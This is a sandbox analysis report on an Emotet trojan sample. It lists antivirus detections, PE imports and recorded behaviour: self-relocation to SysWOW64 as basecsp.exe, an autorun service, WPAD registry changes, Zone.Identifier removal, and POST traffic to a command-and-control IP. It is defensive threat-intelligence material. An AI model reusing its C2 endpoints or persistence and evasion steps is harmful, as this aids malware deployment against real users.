11.8
0-day
52 个模型检测该样本为恶意!
重新分析
更多

495865fbcf7ee7bf794e5a39ed847fe5605d10b649fbbc258e39374ace7f559d

e961c569bc3ef0e591486150db917688.exe

分析耗时

113s

最近分析

文件大小

884.0KB
静态报毒 动态报毒 3Y0@ASGSGQOJ AI SCORE=100 BANKERX CLASSIC DOWNLOADER34 ELDORADO EMOTET FHGO GENCIRC GENERICKDZ GENETIC HFEW HIGH CONFIDENCE HPCJZU IYPGW KCLOUD KRYPTIK MALWARE@#RCVL5C5JMTDA R + TROJ SCORE SGENERIC THIAABO UNSAFE WACATAC ZEXAF ZNEOHWOHRO4 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FRI!E961C569BC3E 20201211 6.0.6.653
Avast 20201211 21.1.5827.0
Alibaba Trojan:Win32/Emotet.34d0985c 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Kingsoft Win32.Hack.Undef.(kcloud) 20201211 2017.9.26.565
Tencent Malware.Win32.Gencirc.10cde4cf 20201211 1.0.0.1
CrowdStrike 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619951444.655625
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (4 个事件)
Time & API Arguments Status Return Repeated
1619951434.874625
CryptGenKey
crypto_handle: 0x003cd940
algorithm_identifier: 0x0000660e ()
provider_handle: 0x00326810
flags: 1
key: flBêuŠ}-˜Å™HñxàÅ
success 1 0
1619951444.655625
CryptExportKey
crypto_handle: 0x003cd940
crypto_export_handle: 0x00325fd0
buffer: f¤ð–é`—Ö>€(´™Œ³öË1 !iŸÛX£ÓaGU{ösf@ÉÜ ½ê‘'ùŽöäñ¾½¥^ËÀÿê)wå> X&µø…„ øw¯³&<“cFÓcR‹(9‰£L
blob_type: 1
flags: 64
success 1 0
1619951471.780625
CryptExportKey
crypto_handle: 0x003cd940
crypto_export_handle: 0x00325fd0
buffer: f¤Œ\—Q•ë ¢‰á̓|Ng79ýi®CZ¡‡Ë§1Éj‰Ú¬§Øä`á+Ve±%®˜S$¹Q!Š©+µ¤ º^ˆØÎêV„©Ÿ>Å+§F÷o%g„"¶ìˆsXèë]
blob_type: 1
flags: 64
success 1 0
1619951496.624625
CryptExportKey
crypto_handle: 0x003cd940
crypto_export_handle: 0x00325fd0
buffer: f¤_Ì7«âåæþé„h)77ìôH3ë`6N!˜· Ÿ&ۛqK`ó'h BøÌ`ß»!SíœZuŽ(¹?V'ùƒÓÇogo’Ê8µõØqC÷Ǫx:¾Ûã 9Յ ։‚Òn
blob_type: 1
flags: 64
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section .didat
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 个事件)
suspicious_features Connection to IP address suspicious_request POST http://37.139.21.175:8080/aGH4/qnN2svK8/gHAHwXkwzomcA2thylh/
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:3085182736&cup2hreq=ab13ebd79b21a2fc7f4578249756096b429f1561e8c7e52e4dea5001be0d2430
Performs some HTTP requests (5 个事件)
request POST http://37.139.21.175:8080/aGH4/qnN2svK8/gHAHwXkwzomcA2thylh/
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619957533&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&mvi=3&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=8a2e83f203724371&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1619957533&mv=m
request POST https://update.googleapis.com/service/update2?cup2key=10:3085182736&cup2hreq=ab13ebd79b21a2fc7f4578249756096b429f1561e8c7e52e4dea5001be0d2430
Sends data using the HTTP POST Method (2 个事件)
request POST http://37.139.21.175:8080/aGH4/qnN2svK8/gHAHwXkwzomcA2thylh/
request POST https://update.googleapis.com/service/update2?cup2key=10:3085182736&cup2hreq=ab13ebd79b21a2fc7f4578249756096b429f1561e8c7e52e4dea5001be0d2430
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619951431.124875
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00850000
success 0 0
1619951489.530875
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000004150000
success 0 0
1619951434.515625
NtAllocateVirtualMemory
process_identifier: 2620
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01de0000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Foreign language identified in PE resource (3 个事件)
name RT_ICON language LANG_CHINESE offset 0x000d8270 filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000128
name RT_ICON language LANG_CHINESE offset 0x000d8270 filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000128
name RT_GROUP_ICON language LANG_CHINESE offset 0x000d8398 filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED size 0x00000022
Drops a binary and executes it (1 个事件)
file C:\Windows\SysWOW64\srchadmin\basecsp.exe
Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 个事件)
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619951432.343875
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\e961c569bc3ef0e591486150db917688.exe
newfilepath: C:\Windows\SysWOW64\srchadmin\basecsp.exe
newfilepath_r: C:\Windows\SysWOW64\srchadmin\basecsp.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\e961c569bc3ef0e591486150db917688.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619951445.843625
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process basecsp.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619951445.562625
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (4 个事件)
host 172.217.24.14
host 212.51.142.238
host 24.234.133.205
host 37.139.21.175
Installs itself for autorun at Windows startup (1 个事件)
service_name basecsp service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\srchadmin\basecsp.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619951433.718875
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x02a6ad88
display_name: basecsp
error_control: 0
service_name: basecsp
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\srchadmin\basecsp.exe"
filepath_r: "C:\Windows\SysWOW64\srchadmin\basecsp.exe"
service_manager_handle: 0x02a6aab8
desired_access: 2
service_type: 16
password:
success 44477832 0
Deletes executed files from disk (1 个事件)
file C:\Windows\SysWOW64\srchadmin\basecsp.exe
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619951448.468625
RegSetValueExA
key_handle: 0x000003c0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619951448.468625
RegSetValueExA
key_handle: 0x000003c0
value: pn:~n?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619951448.468625
RegSetValueExA
key_handle: 0x000003c0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619951448.468625
RegSetValueExW
key_handle: 0x000003c0
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619951448.468625
RegSetValueExA
key_handle: 0x000003d8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619951448.468625
RegSetValueExA
key_handle: 0x000003d8
value: pn:~n?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619951448.483625
RegSetValueExA
key_handle: 0x000003d8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619951448.499625
RegSetValueExW
key_handle: 0x000003bc
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\srchadmin\basecsp.exe:Zone.Identifier
File has been identified by 52 AntiVirus engines on VirusTotal as malicious (50 out of 52 个事件)
Elastic malicious (high confidence)
DrWeb Trojan.DownLoader34.8714
MicroWorld-eScan Trojan.GenericKDZ.69062
McAfee Emotet-FRI!E961C569BC3E
Cylance Unsafe
Zillya Backdoor.Emotet.Win32.654
Sangfor Malware
K7AntiVirus Trojan ( 0056b5341 )
BitDefender Trojan.GenericKDZ.69062
K7GW Trojan ( 0056b5341 )
BitDefenderTheta Gen:NN.ZexaF.34670.3y0@aSgsgqoj
Cyren W32/Emotet.AOA.gen!Eldorado
Symantec Trojan.Emotet
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.THIAABO
ClamAV Win.Malware.Generickdz-9760856-0
Kaspersky HEUR:Trojan-Banker.Win32.Emotet.pef
Alibaba Trojan:Win32/Emotet.34d0985c
NANO-Antivirus Trojan.Win32.Kryptik.hpcjzu
Rising Trojan.Kryptik!1.C80B (CLASSIC)
Ad-Aware Trojan.GenericKDZ.69062
Sophos Mal/Generic-R + Troj/Emotet-CKH
Comodo Malware@#rcvl5c5jmtda
F-Secure Trojan.TR/Kryptik.iypgw
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition BehavesLike.Win32.Emotet.cm
Emsisoft Trojan.Emotet (A)
Jiangmin Backdoor.Emotet.oj
Avira TR/Kryptik.iypgw
MAX malware (ai score=100)
Antiy-AVL Trojan/Win32.SGeneric
Kingsoft Win32.Hack.Undef.(kcloud)
Microsoft Trojan:Win32/Emotet.ARJ!MTB
Gridinsoft Ransom.Win32.Wacatac.oa!s1
Arcabit Trojan.Generic.D10DC6
ZoneAlarm HEUR:Trojan-Banker.Win32.Emotet.pef
GData Trojan.GenericKDZ.69062
Cynet Malicious (score: 85)
AhnLab-V3 Malware/Win32.Generic.C4170346
VBA32 Trojan.Downloader
ALYac Trojan.GenericKDZ.69062
TACHYON Trojan/W32.Agent.905216.JD
Malwarebytes Trojan.Emotet
Panda Trj/Genetic.gen
APEX Malicious
ESET-NOD32 a variant of Win32/Kryptik.HFEW
Tencent Malware.Win32.Gencirc.10cde4cf
Yandex Trojan.Agent!zNEOhWohRo4
Ikarus Trojan-Banker.Agent
Fortinet W32/Emotet.FHGO!tr
AVG Win32:BankerX-gen [Trj]
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 个事件)
dead_host 172.217.160.110:443
dead_host 172.217.24.14:443
dead_host 24.234.133.205:80
dead_host 212.51.142.238:8080
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-07-28 04:57:13

Imports

Library KERNEL32.dll:
0x4d1f44 SetFileTime
0x4d1f48 SetFileAttributesA
0x4d1f4c GetFileAttributesA
0x4d1f50 GetFileTime
0x4d1f54 SetErrorMode
0x4d1f58 GetTickCount
0x4d1f5c RtlUnwind
0x4d1f60 RaiseException
0x4d1f64 HeapAlloc
0x4d1f68 HeapFree
0x4d1f6c HeapReAlloc
0x4d1f70 VirtualProtect
0x4d1f74 VirtualAlloc
0x4d1f78 GetSystemInfo
0x4d1f7c VirtualQuery
0x4d1f80 GetCommandLineA
0x4d1f84 GetProcessHeap
0x4d1f88 GetStartupInfoA
0x4d1f8c ExitProcess
0x4d1f90 ExitThread
0x4d1f94 CreateThread
0x4d1f98 HeapSize
0x4d1f9c TerminateProcess
0x4d1fa8 IsDebuggerPresent
0x4d1fac Sleep
0x4d1fb0 GetACP
0x4d1fb4 FatalAppExitA
0x4d1fb8 VirtualFree
0x4d1fc0 HeapCreate
0x4d1fc4 GetStdHandle
0x4d1fd8 SetHandleCount
0x4d1fdc GetFileType
0x4d1fec GetStringTypeA
0x4d1ff0 GetStringTypeW
0x4d1ff8 GetConsoleCP
0x4d1ffc GetConsoleMode
0x4d2000 LCMapStringA
0x4d2004 LCMapStringW
0x4d2008 GetTimeFormatA
0x4d200c GetDateFormatA
0x4d2010 GetUserDefaultLCID
0x4d2014 EnumSystemLocalesA
0x4d2018 IsValidLocale
0x4d201c IsValidCodePage
0x4d2020 GetLocaleInfoW
0x4d2024 SetStdHandle
0x4d2028 WriteConsoleA
0x4d202c GetConsoleOutputCP
0x4d2030 WriteConsoleW
0x4d2044 GetAtomNameA
0x4d2048 GetOEMCP
0x4d204c GetCPInfo
0x4d2050 CreateFileA
0x4d2054 GetShortPathNameA
0x4d2058 GetFullPathNameA
0x4d2060 FindFirstFileA
0x4d2064 FindClose
0x4d2068 DuplicateHandle
0x4d206c GetThreadLocale
0x4d2070 GetFileSize
0x4d2074 SetEndOfFile
0x4d2078 UnlockFile
0x4d207c LockFile
0x4d2080 FlushFileBuffers
0x4d2084 SetFilePointer
0x4d2088 WriteFile
0x4d208c ReadFile
0x4d2090 DeleteFileA
0x4d2094 MoveFileA
0x4d209c TlsFree
0x4d20a4 LocalReAlloc
0x4d20a8 TlsSetValue
0x4d20ac TlsAlloc
0x4d20b4 GlobalHandle
0x4d20bc TlsGetValue
0x4d20c4 LocalAlloc
0x4d20c8 GlobalFlags
0x4d20dc GlobalReAlloc
0x4d20e4 GetModuleFileNameW
0x4d20e8 CopyFileA
0x4d20ec GlobalSize
0x4d20f0 FormatMessageA
0x4d20f4 LocalFree
0x4d20f8 MulDiv
0x4d20fc GlobalGetAtomNameA
0x4d2100 GlobalFindAtomA
0x4d2104 lstrcmpW
0x4d2108 GetVersionExA
0x4d210c GlobalUnlock
0x4d2110 GlobalFree
0x4d2114 FreeResource
0x4d2118 GetCurrentProcessId
0x4d211c SetLastError
0x4d2120 GlobalAddAtomA
0x4d2124 CreateEventA
0x4d2128 SuspendThread
0x4d212c SetEvent
0x4d2130 WaitForSingleObject
0x4d2134 ResumeThread
0x4d2138 SetThreadPriority
0x4d213c CloseHandle
0x4d2140 GetCurrentThread
0x4d2144 GetCurrentThreadId
0x4d214c GetModuleFileNameA
0x4d2154 GetLocaleInfoA
0x4d2158 GlobalLock
0x4d215c lstrcmpA
0x4d2160 GlobalAlloc
0x4d2164 GlobalDeleteAtom
0x4d2168 GetModuleHandleA
0x4d216c GetStringTypeExW
0x4d2170 GetStringTypeExA
0x4d217c lstrlenA
0x4d2180 lstrcmpiW
0x4d2184 lstrcmpiA
0x4d2188 CompareStringW
0x4d218c CompareStringA
0x4d2190 lstrlenW
0x4d2194 GetVersion
0x4d2198 GetLastError
0x4d219c MultiByteToWideChar
0x4d21a0 InterlockedExchange
0x4d21a8 LoadLibraryA
0x4d21ac FreeLibrary
0x4d21b0 lstrcatA
0x4d21b4 CreateProcessA
0x4d21b8 LoadLibraryExA
0x4d21bc GetProcAddress
0x4d21c0 GetCurrentProcess
0x4d21c4 WideCharToMultiByte
0x4d21c8 WinExec
0x4d21cc FindResourceA
0x4d21d0 LoadResource
0x4d21d4 LockResource
0x4d21d8 HeapDestroy
0x4d21dc SizeofResource
Library USER32.dll:
0x4d2404 CharNextA
0x4d240c IsRectEmpty
0x4d2410 SetRect
0x4d2414 InvalidateRgn
0x4d2418 GetNextDlgGroupItem
0x4d241c UnregisterClassA
0x4d2424 SetMenu
0x4d2428 BringWindowToTop
0x4d242c CreatePopupMenu
0x4d2430 InsertMenuItemA
0x4d2434 LoadAcceleratorsA
0x4d2438 LoadMenuA
0x4d243c ReuseDDElParam
0x4d2440 UnpackDDElParam
0x4d2448 GetKeyNameTextA
0x4d244c MapVirtualKeyA
0x4d2450 SetParent
0x4d2454 UnionRect
0x4d2458 PostThreadMessageA
0x4d245c SetTimer
0x4d2460 KillTimer
0x4d2464 GetDCEx
0x4d2468 LockWindowUpdate
0x4d246c GrayStringA
0x4d2470 DrawTextExA
0x4d2474 DrawTextA
0x4d2478 TabbedTextOutA
0x4d247c FillRect
0x4d2480 GetMenuStringA
0x4d2484 InsertMenuA
0x4d2488 RemoveMenu
0x4d248c ScrollWindowEx
0x4d2490 ShowWindow
0x4d2494 MoveWindow
0x4d2498 SetWindowTextA
0x4d249c IsDialogMessageA
0x4d24a0 IsDlgButtonChecked
0x4d24a4 SetDlgItemTextA
0x4d24a8 SetDlgItemInt
0x4d24ac GetDlgItemTextA
0x4d24b0 GetDlgItemInt
0x4d24b4 CheckRadioButton
0x4d24b8 CheckDlgButton
0x4d24c0 SendDlgItemMessageA
0x4d24c4 WinHelpA
0x4d24c8 IsChild
0x4d24cc GetCapture
0x4d24d0 GetClassLongA
0x4d24d4 GetClassNameA
0x4d24d8 SetPropA
0x4d24dc GetPropA
0x4d24e0 RemovePropA
0x4d24e4 SetFocus
0x4d24ec GetWindowTextA
0x4d24f0 GetForegroundWindow
0x4d24f4 BeginDeferWindowPos
0x4d24f8 EndDeferWindowPos
0x4d24fc GetTopWindow
0x4d2500 GetMessageTime
0x4d2504 GetMessagePos
0x4d2508 MapWindowPoints
0x4d250c ScrollWindow
0x4d2510 TrackPopupMenuEx
0x4d2514 GetDialogBaseUnits
0x4d2518 SetScrollRange
0x4d251c GetScrollRange
0x4d2520 SetScrollPos
0x4d2524 GetScrollPos
0x4d2528 SetForegroundWindow
0x4d252c ShowScrollBar
0x4d2530 UpdateWindow
0x4d2534 GetMenu
0x4d2538 GetSubMenu
0x4d253c GetMenuItemID
0x4d2540 GetMenuItemCount
0x4d2544 CreateWindowExA
0x4d2548 GetClassInfoExA
0x4d254c GetClassInfoA
0x4d2550 RegisterClassA
0x4d2554 AdjustWindowRectEx
0x4d2558 ScreenToClient
0x4d255c EqualRect
0x4d2560 DeferWindowPos
0x4d2564 CopyRect
0x4d2568 GetScrollInfo
0x4d256c SetScrollInfo
0x4d2570 SetWindowPlacement
0x4d2574 GetDlgCtrlID
0x4d2578 DefWindowProcA
0x4d257c CallWindowProcA
0x4d2580 OffsetRect
0x4d2584 IntersectRect
0x4d258c GetWindowPlacement
0x4d2590 GetWindow
0x4d2598 MapDialogRect
0x4d259c SetWindowPos
0x4d25a0 GetDesktopWindow
0x4d25a4 SetActiveWindow
0x4d25ac DestroyWindow
0x4d25b0 GetDlgItem
0x4d25b4 GetNextDlgTabItem
0x4d25b8 EndDialog
0x4d25c0 GetWindowLongA
0x4d25c4 GetLastActivePopup
0x4d25c8 IsWindowEnabled
0x4d25cc MessageBoxA
0x4d25d0 ShowOwnedPopups
0x4d25d4 SetWindowsHookExA
0x4d25d8 CallNextHookEx
0x4d25dc GetMessageA
0x4d25e0 PtInRect
0x4d25e4 SetRectEmpty
0x4d25e8 DrawIcon
0x4d25ec AppendMenuA
0x4d25f0 SendMessageA
0x4d25f4 GetSystemMenu
0x4d25f8 TranslateMessage
0x4d25fc DispatchMessageA
0x4d2600 GetActiveWindow
0x4d2604 IsWindowVisible
0x4d2608 GetKeyState
0x4d260c PeekMessageA
0x4d2610 GetCursorPos
0x4d2614 ValidateRect
0x4d2618 SetMenuItemBitmaps
0x4d2620 LoadBitmapA
0x4d2624 GetFocus
0x4d2628 ModifyMenuA
0x4d262c DestroyIcon
0x4d2630 GetSysColorBrush
0x4d2634 WaitMessage
0x4d2638 DeleteMenu
0x4d263c WindowFromPoint
0x4d2640 DestroyMenu
0x4d2644 GetMenuItemInfoA
0x4d2648 EndPaint
0x4d264c BeginPaint
0x4d2650 GetWindowDC
0x4d2654 TrackPopupMenu
0x4d2658 ClientToScreen
0x4d265c IsIconic
0x4d2660 GetWindowRect
0x4d2664 GetClientRect
0x4d2668 InvalidateRect
0x4d266c OpenClipboard
0x4d2670 EnableWindow
0x4d2674 LoadIconA
0x4d2678 GetSystemMetrics
0x4d267c CloseClipboard
0x4d2680 SetClipboardData
0x4d2684 SetCursor
0x4d2688 InflateRect
0x4d268c GetDC
0x4d2690 ReleaseDC
0x4d2694 RedrawWindow
0x4d2698 SetCapture
0x4d269c GetParent
0x4d26a0 MessageBeep
0x4d26a4 ReleaseCapture
0x4d26a8 IsWindow
0x4d26ac GetSysColor
0x4d26b0 DestroyCursor
0x4d26b4 SetWindowLongA
0x4d26b8 CopyIcon
0x4d26bc LoadCursorA
0x4d26c0 CharLowerA
0x4d26c4 CharLowerW
0x4d26c8 CharUpperA
0x4d26cc CharUpperW
0x4d26d0 PostQuitMessage
0x4d26d4 PostMessageA
0x4d26d8 CheckMenuItem
0x4d26dc EnableMenuItem
0x4d26e0 GetMenuState
0x4d26e4 UnhookWindowsHookEx
Library GDI32.dll:
0x4d1d60 ScaleViewportExtEx
0x4d1d64 SetWindowOrgEx
0x4d1d68 OffsetWindowOrgEx
0x4d1d6c SetWindowExtEx
0x4d1d70 ScaleWindowExtEx
0x4d1d78 ArcTo
0x4d1d7c PolyDraw
0x4d1d80 PolylineTo
0x4d1d84 PolyBezierTo
0x4d1d88 ExtSelectClipRgn
0x4d1d8c DeleteDC
0x4d1d94 CreatePatternBrush
0x4d1d98 CreateCompatibleDC
0x4d1d9c SelectPalette
0x4d1da0 PlayMetaFileRecord
0x4d1da4 GetObjectType
0x4d1da8 EnumMetaFile
0x4d1dac SetViewportExtEx
0x4d1db0 CreatePen
0x4d1db4 ExtCreatePen
0x4d1db8 CreateSolidBrush
0x4d1dbc CreateHatchBrush
0x4d1dc4 SetRectRgn
0x4d1dc8 CombineRgn
0x4d1dcc GetMapMode
0x4d1dd0 PatBlt
0x4d1dd4 DPtoLP
0x4d1dd8 GetTextMetricsA
0x4d1ddc GetBkColor
0x4d1de0 GetTextColor
0x4d1de4 GetRgnBox
0x4d1dec GetCharWidthA
0x4d1df0 CreateFontA
0x4d1df4 StretchDIBits
0x4d1df8 OffsetViewportOrgEx
0x4d1dfc SetViewportOrgEx
0x4d1e00 SelectObject
0x4d1e04 Escape
0x4d1e08 ExtTextOutA
0x4d1e0c TextOutA
0x4d1e10 RectVisible
0x4d1e14 PtVisible
0x4d1e18 StartDocA
0x4d1e1c GetPixel
0x4d1e20 BitBlt
0x4d1e24 PlayMetaFile
0x4d1e28 CreateBrushIndirect
0x4d1e2c GetViewportExtEx
0x4d1e30 SelectClipPath
0x4d1e34 CreateRectRgn
0x4d1e38 GetClipRgn
0x4d1e3c SelectClipRgn
0x4d1e40 DeleteObject
0x4d1e44 SetColorAdjustment
0x4d1e48 SetArcDirection
0x4d1e4c SetMapperFlags
0x4d1e58 SetTextAlign
0x4d1e5c MoveToEx
0x4d1e60 LineTo
0x4d1e64 OffsetClipRgn
0x4d1e68 IntersectClipRect
0x4d1e6c ExcludeClipRect
0x4d1e70 SetMapMode
0x4d1e78 SetWorldTransform
0x4d1e7c SetGraphicsMode
0x4d1e80 SetStretchBltMode
0x4d1e84 SetROP2
0x4d1e88 SetPolyFillMode
0x4d1e8c SetBkMode
0x4d1e90 RestoreDC
0x4d1e94 SaveDC
0x4d1e98 CreateDCA
0x4d1e9c CopyMetaFileA
0x4d1ea0 GetDeviceCaps
0x4d1ea4 SetBkColor
0x4d1ea8 SetTextColor
0x4d1eac GetClipBox
0x4d1eb0 GetDCOrgEx
0x4d1eb8 GetObjectA
0x4d1ebc CreateFontIndirectA
0x4d1ec0 GetStockObject
0x4d1ec4 Rectangle
0x4d1ec8 CreateBitmap
0x4d1ecc GetWindowExtEx
Library comdlg32.dll:
0x4d27e0 GetFileTitleA
Library WINSPOOL.DRV:
0x4d27a8 DocumentPropertiesA
0x4d27ac OpenPrinterA
0x4d27b0 ClosePrinter
Library ADVAPI32.dll:
0x4d1cfc RegDeleteValueA
0x4d1d00 RegSetValueExA
0x4d1d04 RegCreateKeyExA
0x4d1d08 RegSetValueA
0x4d1d0c RegOpenKeyA
0x4d1d10 RegEnumKeyA
0x4d1d14 RegDeleteKeyA
0x4d1d18 RegQueryValueA
0x4d1d1c RegOpenKeyExA
0x4d1d20 RegQueryValueExA
0x4d1d24 RegCloseKey
0x4d1d28 RegCreateKeyA
Library SHELL32.dll:
0x4d237c ExtractIconA
0x4d2380 SHGetFileInfoA
0x4d2384 DragFinish
0x4d2388 DragQueryFileA
0x4d238c ShellExecuteA
Library SHLWAPI.dll:
0x4d23c4 PathFindFileNameA
0x4d23c8 PathStripToRootA
0x4d23cc PathFindExtensionA
0x4d23d0 PathIsUNCA
Library oledlg.dll:
0x4d28d8
Library ole32.dll:
0x4d2814 OleInitialize
0x4d281c OleUninitialize
0x4d2820 OleRun
0x4d2824 StringFromGUID2
0x4d2828 CoCreateInstance
0x4d282c CoDisconnectObject
0x4d283c CoGetClassObject
0x4d2840 OleDuplicateData
0x4d2844 CoRevokeClassObject
0x4d2848 ReleaseStgMedium
0x4d284c CreateBindCtx
0x4d2850 CoTreatAsClass
0x4d2854 StringFromCLSID
0x4d2858 ReadClassStg
0x4d285c ReadFmtUserTypeStg
0x4d2860 OleRegGetUserType
0x4d2864 WriteClassStg
0x4d2868 WriteFmtUserTypeStg
0x4d286c SetConvertStg
0x4d2870 CoTaskMemFree
0x4d2874 CLSIDFromString
0x4d2878 CLSIDFromProgID
0x4d2880 OleSetClipboard
0x4d2884 OleFlushClipboard
0x4d288c CoTaskMemAlloc
Library OLEAUT32.dll:
0x4d2290 SysAllocStringLen
0x4d2294 VariantClear
0x4d2298 VariantChangeType
0x4d229c VariantInit
0x4d22a0 SysStringLen
0x4d22a8 SysStringByteLen
0x4d22b8 SafeArrayDestroy
0x4d22bc SysAllocString
0x4d22c4 SafeArrayAccessData
0x4d22c8 SafeArrayGetUBound
0x4d22cc SafeArrayGetLBound
0x4d22d4 SafeArrayGetDim
0x4d22d8 SafeArrayCreate
0x4d22dc SafeArrayRedim
0x4d22e0 VariantCopy
0x4d22e4 SafeArrayAllocData
0x4d22ec SafeArrayCopy
0x4d22f0 SafeArrayGetElement
0x4d22f4 SafeArrayPtrOfIndex
0x4d22f8 SafeArrayPutElement
0x4d22fc SafeArrayLock
0x4d2300 SafeArrayUnlock
0x4d230c SysReAllocStringLen
0x4d2310 VarDateFromStr
0x4d2314 VarBstrFromCy
0x4d2318 VarBstrFromDec
0x4d231c VarDecFromStr
0x4d2320 VarCyFromStr
0x4d2324 VarBstrFromDate
0x4d2328 LoadTypeLib
0x4d232c SysFreeString

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49194 113.108.239.194 r1---sn-j5o7dn7e.gvt1.com 80
